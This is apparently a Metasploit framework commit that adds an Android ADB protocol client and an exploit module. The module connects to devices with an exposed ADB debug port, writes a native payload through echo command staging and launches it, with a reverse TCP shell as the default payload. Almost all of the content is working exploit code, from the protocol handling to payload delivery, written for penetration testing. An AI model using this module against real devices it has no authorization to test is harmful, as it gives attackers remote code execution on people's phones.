Land rapid7#6421, ADB protocol and exploit

Author: wvu

lib/rex/exploitation/cmdstager/echo.rb

@@ -35,7 +35,7 @@ def generate(opts = {})
     end
 
     # by default use the 'hex' encoding
-    opts[:enc_format] = opts[:enc_format] || 'hex'
+    opts[:enc_format] = opts[:enc_format].nil? ? 'hex' : opts[:enc_format].to_s
 
     unless ENCODINGS.keys.include?(opts[:enc_format])
       raise RuntimeError, "CmdStagerEcho - Invalid Encoding Option: #{opts[:enc_format]}"
@@ -58,7 +58,7 @@ def generate_cmds(opts)
     xtra_len = @cmd_start.length + @cmd_end.length
     opts.merge!({ :extra => xtra_len })
 
-    @prefix = ENCODINGS[opts[:enc_format]]
+    @prefix = opts[:prefix] || ENCODINGS[opts[:enc_format]]
     min_part_size = 5 # for both encodings
 
     if (opts[:linemax] - opts[:extra]) < min_part_size
@@ -108,7 +108,7 @@ def generate_cmds_decoder(opts)
     # Make it all happen
     cmds << "chmod 777 #{@tempdir}#{@var_elf}"
     #cmds << "chmod +x #{@tempdir}#{@var_elf}"
-    cmds << "#{@tempdir}#{@var_elf}"
+    cmds << "#{@tempdir}#{@var_elf}#{' & echo' if opts[:background]}"
 
     # Clean up after unless requested not to..
     unless opts[:nodelete]

lib/rex/proto/adb.rb

@@ -0,0 +1,7 @@
+# -*- coding: binary -*-
+#
+# Support for the ADB android debugging protocol
+#
+
+require 'rex/proto/adb/client'
+require 'rex/proto/adb/message'

lib/rex/proto/adb/client.rb

@@ -0,0 +1,39 @@
+# -*- coding: binary -*-
+
+##
+# ADB protocol support
+##
+
+require 'rex/proto/adb/message'
+
+module Rex
+module Proto
+module ADB
+
+class Client
+
+  def initialize(sock, opts = {})
+    @sock = sock
+    @opts = opts
+    @local_id_counter = 0x0a
+  end
+
+  def connect
+    ADB::Message::Connect.new.send_recv(@sock)
+  end
+
+  def exec_cmd(cmd)
+    local_id = @local_id_counter += 1
+    response = ADB::Message::Open.new(local_id, "shell:"+cmd).send_recv(@sock)
+    ADB::Message::Close.new(local_id, response.arg0).send_recv(@sock)
+  end
+
+  def read_message
+    ADB::Message.read(@sock)
+  end
+
+end # Client
+
+end # ADB
+end # Proto
+end # Rex

lib/rex/proto/adb/message.rb

@@ -0,0 +1,164 @@
+# -*- coding: binary -*-
+
+##
+# ADB protocol support
+##
+
+module Rex
+module Proto
+module ADB
+
+# A Message for the ADB protocol. For documentation see:
+# https://android.googlesource.com/platform/system/core/+/master/adb/protocol.txt
+class Message
+
+  WORD_WIDTH = 4 # bytes
+  WORD_PACK = 'L<'
+
+  attr_accessor :command
+  attr_accessor :arg0
+  attr_accessor :arg1
+  attr_accessor :data
+
+  def initialize(arg0, arg1, data)
+    self.command = self.class::COMMAND if defined?(self.class::COMMAND)
+    self.arg0 = arg0
+    self.arg1 = arg1
+    self.data = data + "\0"
+  end
+
+  def data_check
+    # this check is implemented in adb/transport.cpp, in the send_packet method.
+    # it is not crc32 as the docs make it appear, it is just a 32bit sum.
+    data.bytes.inject(&:+) & 0xffffffff
+  end
+
+  def magic
+    command_word ^ 0xffffffff
+  end
+
+  def command_word
+    command.unpack(WORD_PACK)[0]
+  end
+
+  def send_recv(socket)
+    socket.print self.serialize
+    Message.read socket
+  end
+
+  def serialize
+    [
+      command_word,
+      arg0,
+      arg1,
+      data.bytes.length,
+      data_check,
+      magic
+    ].pack(WORD_PACK+'*') + data
+  end
+
+  def to_s
+    [
+      "command=#{command}",
+      "arg0=0x#{arg0.to_s(16)}",
+      "arg1=0x#{arg1.to_s(16)}",
+      "data=#{data}"
+    ].join("\n")
+  end
+
+  def self.read(socket)
+    header = socket.recvfrom(6 * WORD_WIDTH)[0]
+    command = header[0, WORD_WIDTH]
+    arg0 = header[WORD_WIDTH, WORD_WIDTH].unpack(WORD_PACK)[0]
+    arg1 = header[WORD_WIDTH*2, WORD_WIDTH].unpack(WORD_PACK)[0]
+    payload_len = header[WORD_WIDTH*3, WORD_WIDTH].unpack(WORD_PACK)[0]
+    payload = socket.recvfrom(payload_len)[0]
+
+    klass = MESSAGE_TYPES.find { |klass| klass::COMMAND == command }
+    if klass.nil?
+      raise "Invalid adb command: #{command}"
+    end
+
+    message = klass.allocate
+    message.command = command
+    message.arg0 = arg0
+    message.arg1 = arg1
+    message.data = payload
+    message
+  end
+
+  #
+  # Subclasses inside Message:: namespace for specific message types
+  #
+
+  class Connect < Message
+    COMMAND = "CNXN"
+    DEFAULT_VERSION = 0x01000000
+    DEFAULT_MAXDATA = 4096
+    DEFAULT_IDENTITY = "host::"
+
+    def initialize(version=DEFAULT_VERSION,
+                   maxdata=DEFAULT_MAXDATA,
+                   system_identity_string=DEFAULT_IDENTITY)
+      super
+    end
+  end
+
+  class Auth < Message
+    COMMAND = "AUTH"
+    TYPE_TOKEN = 1
+    TYPE_SIGNATURE = 2
+
+    def initialize(type, data)
+      super(type, 0, data)
+    end
+  end
+
+  class Open < Message
+    COMMAND = "OPEN"
+
+    def initialize(local_id, destination)
+      super(local_id, 0, destination)
+    end
+  end
+
+  class Ready < Message
+    COMMAND = "OKAY"
+
+    def initialize(local_id, remote_id)
+      super(local_id, remote_id, "")
+    end
+  end
+
+  class Write < Message
+    COMMAND = "WRTE"
+
+    def initialize(local_id, remote_id, data)
+      super
+    end
+  end
+
+  class Close < Message
+    COMMAND = "CLSE"
+
+    def initialize(local_id, remote_id)
+      super(local_id, remote_id, "")
+    end
+  end
+
+  class Sync < Message
+    COMMAND = "SYNC"
+
+    def initialize(online, sequence)
+      super(online, sequence, "")
+    end
+  end
+
+  # Avoid a dependency on Rails's nice Class#subclasses
+  MESSAGE_TYPES = [Connect, Auth, Open, Ready, Write, Close, Sync]
+
+end # Message
+
+end # ADB
+end # Proto
+end # Rex

modules/exploits/android/adb/adb_server_exec.rb

@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/adb'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Android ADB Debug Server Remote Payload Execution',
+      'Description'    => %q{
+        Writes and spawns a native payload on an android device that is listening
+        for adb debug messages.
+      },
+      'Author'         => ['joev'],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_ARMLE, ARCH_X86, ARCH_X86_64, ARCH_MIPSLE],
+      'Targets'        => [
+        ['armle',  {'Arch' => ARCH_ARMLE}],
+        ['x86',    {'Arch' => ARCH_X86}],
+        ['x64',    {'Arch' => ARCH_X86_64}],
+        ['mipsle', {'Arch' => ARCH_MIPSLE}]
+      ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 01 2016'
+    ))
+
+    register_options([
+      Opt::RPORT(5555),
+      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
+    ], self.class)
+  end
+
+  def check
+    setup_adb_connection do
+      device_info = @adb_client.connect.data
+      print_good "Detected device:\n#{device_info}"
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def execute_command(cmd, opts)
+    response = @adb_client.exec_cmd(cmd)
+    print_good "Command executed, response:\n #{response}"
+  end
+
+  def exploit
+    setup_adb_connection do
+      device_data = @adb_client.connect
+      print_good "Connected to device:\n#{device_data.data}"
+      execute_cmdstager({
+        flavor: :echo,
+        enc_format: :octal,
+        prefix: '\\\\0',
+        temp: datastore['WritableDir'],
+        linemax: Rex::Proto::ADB::Message::Connect::DEFAULT_MAXDATA-8,
+        background: true,
+        nodelete: true
+      })
+    end
+  end
+
+  def setup_adb_connection(&blk)
+    begin
+      print_status "Connecting to device..."
+      connect
+      @adb_client = Rex::Proto::ADB::Client.new(sock)
+      blk.call
+    ensure
+      disconnect
+    end
+  end
+
+end